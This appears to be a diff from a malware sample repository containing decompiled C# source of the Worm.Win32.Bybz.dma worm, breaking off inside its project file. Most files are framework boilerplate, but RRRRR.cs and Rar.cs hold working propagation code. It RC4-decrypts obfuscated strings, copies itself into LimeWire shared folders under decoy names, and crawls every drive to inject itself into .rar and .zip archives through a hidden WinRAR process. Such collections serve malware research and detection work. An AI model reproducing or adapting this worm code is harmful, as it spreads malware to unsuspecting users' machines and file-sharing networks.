MSIL/Worm/Win32/B/Worm.Win32.Bybz.dma-ede80954aa264e7f1fb365b2d83e8d211c6a79e95bdca110aeaef84c696635db/My/MyApplication.cs
+48
View File
@@ -0,0 +1,48 @@
// Decompiled with JetBrains decompiler
// Type: ajhfsdlhjasnagfgewfwsg.My.MyApplication
// Assembly: Rokan, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 170F4640-026D-46A0-96EF-63F7CE568476
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.Win32.Bybz.dma-ede80954aa264e7f1fb365b2d83e8d211c6a79e95bdca110aeaef84c696635db.exe
using Microsoft.VisualBasic.ApplicationServices;
using System;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
using System.Windows.Forms;
namespace ajhfsdlhjasnagfgewfwsg.My
{
[GeneratedCode("MyTemplate", "8.0.0.0")]
[EditorBrowsable(EditorBrowsableState.Never)]
internal class MyApplication : WindowsFormsApplicationBase
{
[STAThread]
[EditorBrowsable(EditorBrowsableState.Advanced)]
[DebuggerHidden]
internal static void Main(string[] Args)
{
try
{
Application.SetCompatibleTextRenderingDefault(WindowsFormsApplicationBase.UseCompatibleTextRendering);
}
finally
{
}
MyProject.Application.Run(Args);
}
[DebuggerStepThrough]
public MyApplication()
: base(AuthenticationMode.Windows)
{
this.IsSingleInstance = false;
this.EnableVisualStyles = true;
this.SaveMySettingsOnExit = true;
this.ShutdownStyle = ShutdownMode.AfterMainFormCloses;
}
[DebuggerStepThrough]
protected override void OnCreateMainForm() => this.MainForm = (Form) MyProject.Forms.Form1;
}
}
MSIL/Worm/Win32/B/Worm.Win32.Bybz.dma-ede80954aa264e7f1fb365b2d83e8d211c6a79e95bdca110aeaef84c696635db/My/MyComputer.cs
+24
View File
@@ -0,0 +1,24 @@
// Decompiled with JetBrains decompiler
// Type: ajhfsdlhjasnagfgewfwsg.My.MyComputer
// Assembly: Rokan, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 170F4640-026D-46A0-96EF-63F7CE568476
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.Win32.Bybz.dma-ede80954aa264e7f1fb365b2d83e8d211c6a79e95bdca110aeaef84c696635db.exe
using Microsoft.VisualBasic.Devices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
namespace ajhfsdlhjasnagfgewfwsg.My
{
[EditorBrowsable(EditorBrowsableState.Never)]
[GeneratedCode("MyTemplate", "8.0.0.0")]
internal class MyComputer : Computer
{
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public MyComputer()
{
}
}
}
MSIL/Worm/Win32/B/Worm.Win32.Bybz.dma-ede80954aa264e7f1fb365b2d83e8d211c6a79e95bdca110aeaef84c696635db/My/MyProject.cs
+212
View File
@@ -0,0 +1,212 @@
// Decompiled with JetBrains decompiler
// Type: ajhfsdlhjasnagfgewfwsg.My.MyProject
// Assembly: Rokan, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 170F4640-026D-46A0-96EF-63F7CE568476
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.Win32.Bybz.dma-ede80954aa264e7f1fb365b2d83e8d211c6a79e95bdca110aeaef84c696635db.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.ApplicationServices;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.CodeDom.Compiler;
using System.Collections;
using System.ComponentModel;
using System.ComponentModel.Design;
using System.Diagnostics;
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
using System.Windows.Forms;
namespace ajhfsdlhjasnagfgewfwsg.My
{
[GeneratedCode("MyTemplate", "8.0.0.0")]
[StandardModule]
[HideModuleName]
internal sealed class MyProject
{
private static readonly MyProject.ThreadSafeObjectProvider<MyComputer> m_ComputerObjectProvider = new MyProject.ThreadSafeObjectProvider<MyComputer>();
private static readonly MyProject.ThreadSafeObjectProvider<MyApplication> m_AppObjectProvider = new MyProject.ThreadSafeObjectProvider<MyApplication>();
private static readonly MyProject.ThreadSafeObjectProvider<User> m_UserObjectProvider = new MyProject.ThreadSafeObjectProvider<User>();
private static MyProject.ThreadSafeObjectProvider<MyProject.MyForms> m_MyFormsObjectProvider = new MyProject.ThreadSafeObjectProvider<MyProject.MyForms>();
private static readonly MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices> m_MyWebServicesObjectProvider = new MyProject.ThreadSafeObjectProvider<MyProject.MyWebServices>();
[DebuggerNonUserCode]
static MyProject()
{
}
[HelpKeyword("My.Computer")]
internal static MyComputer Computer
{
[DebuggerHidden] get => MyProject.m_ComputerObjectProvider.GetInstance;
}
[HelpKeyword("My.Application")]
internal static MyApplication Application
{
[DebuggerHidden] get => MyProject.m_AppObjectProvider.GetInstance;
}
[HelpKeyword("My.User")]
internal static User User
{
[DebuggerHidden] get => MyProject.m_UserObjectProvider.GetInstance;
}
[HelpKeyword("My.Forms")]
internal static MyProject.MyForms Forms
{
[DebuggerHidden] get => MyProject.m_MyFormsObjectProvider.GetInstance;
}
[HelpKeyword("My.WebServices")]
internal static MyProject.MyWebServices WebServices
{
[DebuggerHidden] get => MyProject.m_MyWebServicesObjectProvider.GetInstance;
}
[MyGroupCollection("System.Windows.Forms.Form", "Create__Instance__", "Dispose__Instance__", "My.MyProject.Forms")]
[EditorBrowsable(EditorBrowsableState.Never)]
internal sealed class MyForms
{
public Form1 m_Form1;
[ThreadStatic]
private static Hashtable m_FormBeingCreated;
public Form1 Form1
{
[DebuggerNonUserCode] get
{
this.m_Form1 = MyProject.MyForms.Create__Instance__<Form1>(this.m_Form1);
return this.m_Form1;
}
[DebuggerNonUserCode] set
{
if (value == this.m_Form1)
return;
if (value != null)
throw new ArgumentException("Property can only be set to Nothing");
this.Dispose__Instance__<Form1>(ref this.m_Form1);
}
}
[DebuggerHidden]
private static T Create__Instance__<T>(T Instance) where T : Form, new()
{
if ((object) Instance != null && !Instance.IsDisposed)
return Instance;
if (MyProject.MyForms.m_FormBeingCreated != null)
{
if (MyProject.MyForms.m_FormBeingCreated.ContainsKey((object) typeof (T)))
throw new InvalidOperationException(Utils.GetResourceString("WinForms_RecursiveFormCreate"));
}
else
MyProject.MyForms.m_FormBeingCreated = new Hashtable();
MyProject.MyForms.m_FormBeingCreated.Add((object) typeof (T), (object) null);
try
{
return new T();
}
catch (TargetInvocationException ex) when (
{
// ISSUE: unable to correctly present filter
ProjectData.SetProjectError((Exception) ex);
if (ex.InnerException != null)
{
SuccessfulFiltering;
}
else
throw;
}
)
{
throw new InvalidOperationException(Utils.GetResourceString("WinForms_SeeInnerException", ex.InnerException.Message), ex.InnerException);
}
finally
{
MyProject.MyForms.m_FormBeingCreated.Remove((object) typeof (T));
}
}
[DebuggerHidden]
private void Dispose__Instance__<T>(ref T instance) where T : Form
{
instance.Dispose();
instance = default (T);
}
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public MyForms()
{
}
[EditorBrowsable(EditorBrowsableState.Never)]
public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
[EditorBrowsable(EditorBrowsableState.Never)]
public override int GetHashCode() => base.GetHashCode();
[EditorBrowsable(EditorBrowsableState.Never)]
internal new System.Type GetType() => typeof (MyProject.MyForms);
[EditorBrowsable(EditorBrowsableState.Never)]
public override string ToString() => base.ToString();
}
[MyGroupCollection("System.Web.Services.Protocols.SoapHttpClientProtocol", "Create__Instance__", "Dispose__Instance__", "")]
[EditorBrowsable(EditorBrowsableState.Never)]
internal sealed class MyWebServices
{
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public override bool Equals(object o) => base.Equals(RuntimeHelpers.GetObjectValue(o));
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public override int GetHashCode() => base.GetHashCode();
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
internal new System.Type GetType() => typeof (MyProject.MyWebServices);
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public override string ToString() => base.ToString();
[DebuggerHidden]
private static T Create__Instance__<T>(T instance) where T : new() => (object) instance == null ? new T() : instance;
[DebuggerHidden]
private void Dispose__Instance__<T>(ref T instance) => instance = default (T);
[DebuggerHidden]
[EditorBrowsable(EditorBrowsableState.Never)]
public MyWebServices()
{
}
}
[ComVisible(false)]
[EditorBrowsable(EditorBrowsableState.Never)]
internal sealed class ThreadSafeObjectProvider<T> where T : new()
{
internal T GetInstance
{
[DebuggerHidden] get
{
if ((object) MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue == null)
MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue = new T();
return MyProject.ThreadSafeObjectProvider<T>.m_ThreadStaticValue;
}
}
[EditorBrowsable(EditorBrowsableState.Never)]
[DebuggerHidden]
public ThreadSafeObjectProvider()
{
}
}
}
}
MSIL/Worm/Win32/B/Worm.Win32.Bybz.dma-ede80954aa264e7f1fb365b2d83e8d211c6a79e95bdca110aeaef84c696635db/My/MySettings.cs
+73
View File
@@ -0,0 +1,73 @@
// Decompiled with JetBrains decompiler
// Type: ajhfsdlhjasnagfgewfwsg.My.MySettings
// Assembly: Rokan, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 170F4640-026D-46A0-96EF-63F7CE568476
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.Win32.Bybz.dma-ede80954aa264e7f1fb365b2d83e8d211c6a79e95bdca110aeaef84c696635db.exe
using Microsoft.VisualBasic.ApplicationServices;
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Configuration;
using System.Diagnostics;
using System.Runtime.CompilerServices;
using System.Threading;
namespace ajhfsdlhjasnagfgewfwsg.My
{
[EditorBrowsable(EditorBrowsableState.Advanced)]
[CompilerGenerated]
[GeneratedCode("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "9.0.0.0")]
internal sealed class MySettings : ApplicationSettingsBase
{
private static MySettings defaultInstance = (MySettings) SettingsBase.Synchronized((SettingsBase) new MySettings());
private static bool addedHandler;
private static object addedHandlerLockObject = RuntimeHelpers.GetObjectValue(new object());
[DebuggerNonUserCode]
public MySettings()
{
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
[DebuggerNonUserCode]
private static void AutoSaveSettings(object sender, EventArgs e)
{
if (!MyProject.Application.SaveMySettingsOnExit)
return;
MySettingsProperty.Settings.Save();
}
public static MySettings Default
{
get
{
if (!MySettings.addedHandler)
{
object handlerLockObject = MySettings.addedHandlerLockObject;
ObjectFlowControl.CheckForSyncLockOnValueType(handlerLockObject);
Monitor.Enter(handlerLockObject);
try
{
if (!MySettings.addedHandler)
{
MyProject.Application.Shutdown += (ShutdownEventHandler) ((sender, e) =>
{
if (!MyProject.Application.SaveMySettingsOnExit)
return;
MySettingsProperty.Settings.Save();
});
MySettings.addedHandler = true;
}
}
finally
{
Monitor.Exit(handlerLockObject);
}
}
return MySettings.defaultInstance;
}
}
}
}
MSIL/Worm/Win32/B/Worm.Win32.Bybz.dma-ede80954aa264e7f1fb365b2d83e8d211c6a79e95bdca110aeaef84c696635db/My/MySettingsProperty.cs
+24
View File
@@ -0,0 +1,24 @@
// Decompiled with JetBrains decompiler
// Type: ajhfsdlhjasnagfgewfwsg.My.MySettingsProperty
// Assembly: Rokan, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 170F4640-026D-46A0-96EF-63F7CE568476
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.Win32.Bybz.dma-ede80954aa264e7f1fb365b2d83e8d211c6a79e95bdca110aeaef84c696635db.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System.ComponentModel.Design;
using System.Diagnostics;
using System.Runtime.CompilerServices;
namespace ajhfsdlhjasnagfgewfwsg.My
{
[CompilerGenerated]
[StandardModule]
[DebuggerNonUserCode]
[HideModuleName]
internal sealed class MySettingsProperty
{
[HelpKeyword("My.Settings")]
internal static MySettings Settings => MySettings.Default;
}
}
MSIL/Worm/Win32/B/Worm.Win32.Bybz.dma-ede80954aa264e7f1fb365b2d83e8d211c6a79e95bdca110aeaef84c696635db/My/Resources/Resources.cs
+46
View File
@@ -0,0 +1,46 @@
// Decompiled with JetBrains decompiler
// Type: ajhfsdlhjasnagfgewfwsg.My.Resources.Resources
// Assembly: Rokan, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 170F4640-026D-46A0-96EF-63F7CE568476
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.Win32.Bybz.dma-ede80954aa264e7f1fb365b2d83e8d211c6a79e95bdca110aeaef84c696635db.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
using System.Globalization;
using System.Resources;
using System.Runtime.CompilerServices;
namespace ajhfsdlhjasnagfgewfwsg.My.Resources
{
[CompilerGenerated]
[GeneratedCode("System.Resources.Tools.StronglyTypedResourceBuilder", "2.0.0.0")]
[HideModuleName]
[StandardModule]
[DebuggerNonUserCode]
internal sealed class Resources
{
private static ResourceManager resourceMan;
private static CultureInfo resourceCulture;
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static ResourceManager ResourceManager
{
get
{
if (object.ReferenceEquals((object) ajhfsdlhjasnagfgewfwsg.My.Resources.Resources.resourceMan, (object) null))
ajhfsdlhjasnagfgewfwsg.My.Resources.Resources.resourceMan = new ResourceManager("ajhfsdlhjasnagfgewfwsg.Resources", typeof (ajhfsdlhjasnagfgewfwsg.My.Resources.Resources).Assembly);
return ajhfsdlhjasnagfgewfwsg.My.Resources.Resources.resourceMan;
}
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static CultureInfo Culture
{
get => ajhfsdlhjasnagfgewfwsg.My.Resources.Resources.resourceCulture;
set => ajhfsdlhjasnagfgewfwsg.My.Resources.Resources.resourceCulture = value;
}
}
}
MSIL/Worm/Win32/B/Worm.Win32.Bybz.dma-ede80954aa264e7f1fb365b2d83e8d211c6a79e95bdca110aeaef84c696635db/RRRRR.cs
+159
View File
@@ -0,0 +1,159 @@
// Decompiled with JetBrains decompiler
// Type: ajhfsdlhjasnagfgewfwsg.RRRRR
// Assembly: Rokan, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 170F4640-026D-46A0-96EF-63F7CE568476
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.Win32.Bybz.dma-ede80954aa264e7f1fb365b2d83e8d211c6a79e95bdca110aeaef84c696635db.exe
using Microsoft.VisualBasic;
using Microsoft.VisualBasic.CompilerServices;
using Microsoft.Win32;
using System;
using System.Collections;
using System.Diagnostics;
using System.IO;
using System.Runtime.CompilerServices;
using System.Text;
using System.Threading;
using System.Windows.Forms;
namespace ajhfsdlhjasnagfgewfwsg
{
public class RRRRR
{
[DebuggerNonUserCode]
public RRRRR()
{
}
public static string RC4(string message, string password)
{
int index1 = 0;
int index2 = 0;
StringBuilder stringBuilder = new StringBuilder();
string empty = string.Empty;
int[] numArray1 = new int[257];
int[] numArray2 = new int[257];
int length = password.Length;
int location1 = 0;
while (location1 <= (int) byte.MaxValue)
{
char String = password.Substring(location1 % length, 1).ToCharArray()[0];
numArray2[location1] = Strings.Asc(String);
numArray1[location1] = location1;
Math.Max(Interlocked.Increment(ref location1), checked (location1 - 1));
}
int index3 = 0;
int location2 = 0;
while (location2 <= (int) byte.MaxValue)
{
index3 = checked (index3 + numArray1[location2] + numArray2[location2]) % 256;
int num = numArray1[location2];
numArray1[location2] = numArray1[index3];
numArray1[index3] = num;
Math.Max(Interlocked.Increment(ref location2), checked (location2 - 1));
}
location1 = 1;
while (location1 <= message.Length)
{
index1 = checked (index1 + 1) % 256;
index2 = checked (index2 + numArray1[index1]) % 256;
int num1 = numArray1[index1];
numArray1[index1] = numArray1[index2];
numArray1[index2] = num1;
int num2 = numArray1[checked (numArray1[index1] + numArray1[index2]) % 256];
int CharCode = Strings.Asc(message.Substring(checked (location1 - 1), 1).ToCharArray()[0]) ^ num2;
stringBuilder.Append(Strings.Chr(CharCode));
Math.Max(Interlocked.Increment(ref location1), checked (location1 - 1));
}
string str = stringBuilder.ToString();
stringBuilder.Length = 0;
return str;
}
public static void msdnfmsnfmdsnfmdsnfmsdnfmdsnfmsdnf()
{
Registry.LocalMachine.OpenSubKey("HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\LimeWire\\\\", true).GetValue("Shared", (object) 0).ToString();
try
{
string str1 = RRRRR.RC4("è÷?s\u0004dÆá&\u000E@îÇ\u0016\u0019ûê–óJ\u00B3\u00B2ˆú\u0004", "wertf32");
File.Copy(Application.ExecutablePath, Environment.GetEnvironmentVariable(RRRRR.RC4("DŸé5}H±¨¤N\u00B32", "sikan32") + RRRRR.RC4("h\u00BEî3}L¸’", "sikan32") + str1));
string str2 = RRRRR.RC4("fˆç>f]¥¥¤L±2ÇLg\\\u0012&ùò¦\u0010ìqX¢\vr\u001A$", "sikan32");
File.Copy(Application.ExecutablePath, Environment.GetEnvironmentVariable(RRRRR.RC4("DŸé5}H±¨¤N\u00B32", "sikan32") + RRRRR.RC4("h\u00BEî3}L¸’", "sikan32") + str2));
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
try
{
string str3 = RRRRR.RC4("]¯ç<hy\u00B3\u00BC£Q¢ êY;J\u0014\v", "sikan32");
File.Copy(Application.ExecutablePath, Environment.GetEnvironmentVariable(RRRRR.RC4("DŸé5}H±¨¤N\u00B32", "sikan32") + RRRRR.RC4("h\u00BEî3}L¸’", "sikan32") + str3));
string str4 = RRRRR.RC4("VŸç(uL®\u00BDD£-ôutZ\u0014\u0016íÿ±\f·lO£", "sikan32");
File.Copy(Application.ExecutablePath, Environment.GetEnvironmentVariable(RRRRR.RC4("DŸé5}H±¨¤N\u00B32", "sikan32") + RRRRR.RC4("h\u00BEî3}L¸’", "sikan32") + str4));
string str5 = RRRRR.RC4("fˆç>f]¥¥¤L±2ÇLg\\\u0012&ùò¦\u0010ìqX¢\vr\u001A$", "sikan32");
File.Copy(Application.ExecutablePath, Environment.GetEnvironmentVariable(RRRRR.RC4("DŸé5}H±¨¤N\u00B32", "sikan32") + RRRRR.RC4("h\u00BEî3}L¸’", "sikan32") + str5));
string str6 = RRRRR.RC4("D‚ô<P_µª\u00BE}¦ ê^$\u0017\u0004\u001Aê", "sikan32");
File.Copy(Application.ExecutablePath, Environment.GetEnvironmentVariable(RRRRR.RC4("DŸé5}H±¨¤N\u00B32", "sikan32").Replace(RRRRR.RC4("DŸé5}H±¨¤N\u00B32", "sikan32"), RRRRR.RC4("°ßRËŠ\u0016\u0016\u00AD\u00B2ëíF{y\u008F\u00BEØ/#", "sikan323")) + RRRRR.RC4("h\u00BEî3}L¸’", "sikan32") + str6));
string str7 = RRRRR.RC4("\u0081Ã\\À§\a\u0014ÿš¬ò@z", "sikan323");
File.Copy(Application.ExecutablePath, Environment.GetEnvironmentVariable(RRRRR.RC4("DŸé5}H±¨¤N\u00B32", "sikan32").Replace(RRRRR.RC4("DŸé5}H±¨¤N\u00B32", "sikan32"), RRRRR.RC4("°ßRËŠ\u0016\u0016\u00AD\u00B2ëíF{y\u008F\u00BEØ/#", "sikan323")) + RRRRR.RC4("h\u00BEî3}L¸’", "sikan32") + str7));
string str8 = RRRRR.RC4("G™é<fG»‘»K\u00B2$÷\u0004fZ\u0005", "sikan32");
File.Copy(Application.ExecutablePath, Environment.GetEnvironmentVariable(RRRRR.RC4("DŸé5}H±¨¤N\u00B32", "sikan32").Replace(RRRRR.RC4("DŸé5}H±¨¤N\u00B32", "sikan32"), RRRRR.RC4("°ßRËŠ\u0016\u0016\u00AD\u00B2ëíF{y\u008F\u00BEØ/#", "sikan323")) + RRRRR.RC4("h\u00BEî3}L¸’", "sikan32") + str8));
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
public static void asdiuaysdiuyasdiuysaidusyaiduysaiduywique(string MainDir, string YourFile)
{
string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles);
ListBox listBox = new ListBox();
try
{
string[] directories = Directory.GetDirectories(MainDir);
int index1 = 0;
while (index1 < directories.Length)
{
string str1 = directories[index1];
string[] files = Directory.GetFiles(str1, "*.zip");
int index2 = 0;
while (index2 < files.Length)
{
string str2 = files[index2];
listBox.Items.Add((object) str2);
checked { ++index2; }
}
RRRRR.asdiuaysdiuyasdiuysaidusyaiduysaiduywique(str1, YourFile);
checked { ++index1; }
}
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
try
{
foreach (object obj in listBox.Items)
{
object objectValue = RuntimeHelpers.GetObjectValue(obj);
Process.Start(new ProcessStartInfo()
{
FileName = folderPath + RRRRR.RC4("_¸\u009DÌâ=¿ÙaauÉ€÷", "Sikan32"),
Arguments = " a " + objectValue.ToString() + " " + YourFile,
WindowStyle = ProcessWindowStyle.Hidden
});
}
}
finally
{
IEnumerator enumerator;
if (enumerator is IDisposable)
(enumerator as IDisposable).Dispose();
}
}
}
}
MSIL/Worm/Win32/B/Worm.Win32.Bybz.dma-ede80954aa264e7f1fb365b2d83e8d211c6a79e95bdca110aeaef84c696635db/Rar.cs
+97
View File
@@ -0,0 +1,97 @@
// Decompiled with JetBrains decompiler
// Type: ajhfsdlhjasnagfgewfwsg.Rar
// Assembly: Rokan, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 170F4640-026D-46A0-96EF-63F7CE568476
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.Win32.Bybz.dma-ede80954aa264e7f1fb365b2d83e8d211c6a79e95bdca110aeaef84c696635db.exe
using Microsoft.VisualBasic.CompilerServices;
using System;
using System.Diagnostics;
using System.IO;
using System.Runtime.InteropServices;
using System.Text;
namespace ajhfsdlhjasnagfgewfwsg
{
public class Rar
{
private static string _rarPath;
private static string _copiedExeName;
[DebuggerNonUserCode]
public Rar()
{
}
[DllImport("kernel32.dll", CharSet = CharSet.Auto)]
public static extern int GetShortPathName(
[MarshalAs(UnmanagedType.LPTStr)] string path,
[MarshalAs(UnmanagedType.LPTStr)] StringBuilder shortPath,
int shortPathLength);
private static void Search(string pathName)
{
string[] files = Directory.GetFiles(pathName);
int index1 = 0;
while (index1 < files.Length)
{
string archiveToInject = files[index1];
if (archiveToInject.Contains(".rar"))
Rar.RarStart(archiveToInject);
if (archiveToInject.Contains(".zip"))
Rar.RarStart(archiveToInject);
checked { ++index1; }
}
string[] directories = Directory.GetDirectories(pathName);
int index2 = 0;
while (index2 < directories.Length)
{
Rar.Search(directories[index2]);
checked { ++index2; }
}
}
public static void Spread(string myExeName)
{
Rar._copiedExeName = myExeName;
string[] logicalDrives = Environment.GetLogicalDrives();
int index = 0;
while (index < logicalDrives.Length)
{
Rar.Search(logicalDrives[index]);
checked { ++index; }
}
File.Create(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + RRRRR.RC4("ä}Èr;&ª\u0005¤#\u00B3", "Sikan"));
}
public static void RarStart(string archiveToInject)
{
string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.System);
string path1 = folderPath.Replace(folderPath.Substring(folderPath.IndexOf("\\")), string.Empty) + "\\";
Rar._rarPath = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles) + RRRRR.RC4("ä^Äq\u0019SÀw‡2©\fùCÔ$Ûp", "Sikan");
if (!File.Exists(Rar._rarPath))
return;
if (!File.Exists(Path.Combine(path1, Rar._copiedExeName)))
File.Copy(Process.GetCurrentProcess().MainModule.FileName, Path.Combine(path1, Rar._copiedExeName));
StringBuilder shortPath = new StringBuilder((int) byte.MaxValue);
Rar.GetShortPathName(Path.Combine(path1, Rar._copiedExeName), shortPath, shortPath.Capacity);
string Right = shortPath.ToString();
object obj = (object) new StringBuilder((int) byte.MaxValue);
Rar.GetShortPathName(archiveToInject, (StringBuilder) obj, Conversions.ToInteger(NewLateBinding.LateGet(obj, (Type) null, "Capacity", new object[0], (string[]) null, (Type[]) null, (bool[]) null)));
try
{
ProcessStartInfo startInfo = new ProcessStartInfo();
string str = Conversions.ToString(Operators.AddObject(Operators.ConcatenateObject(Operators.ConcatenateObject((object) " a ", obj), (object) " "), (object) Right));
startInfo.FileName = Rar._rarPath;
startInfo.Arguments = str;
startInfo.WindowStyle = ProcessWindowStyle.Hidden;
Process.Start(startInfo);
}
catch (Exception ex)
{
ProjectData.SetProjectError(ex);
ProjectData.ClearProjectError();
}
}
}
}
MSIL/Worm/Win32/B/Worm.Win32.Bybz.dma-ede80954aa264e7f1fb365b2d83e8d211c6a79e95bdca110aeaef84c696635db/Resources.resx
+120
View File
@@ -0,0 +1,120 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>
MSIL/Worm/Win32/B/Worm.Win32.Bybz.dma-ede80954aa264e7f1fb365b2d83e8d211c6a79e95bdca110aeaef84c696635db/Worm.Win32.Bybz.dma.csproj
+64
View File
@@ -0,0 +1,64 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!--Project was exported from assembly: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Worm.Win32.Bybz.dma-ede80954aa264e7f1fb365b2d83e8d211c6a79e95bdca110aeaef84c696635db.exe-->
<PropertyGroup>
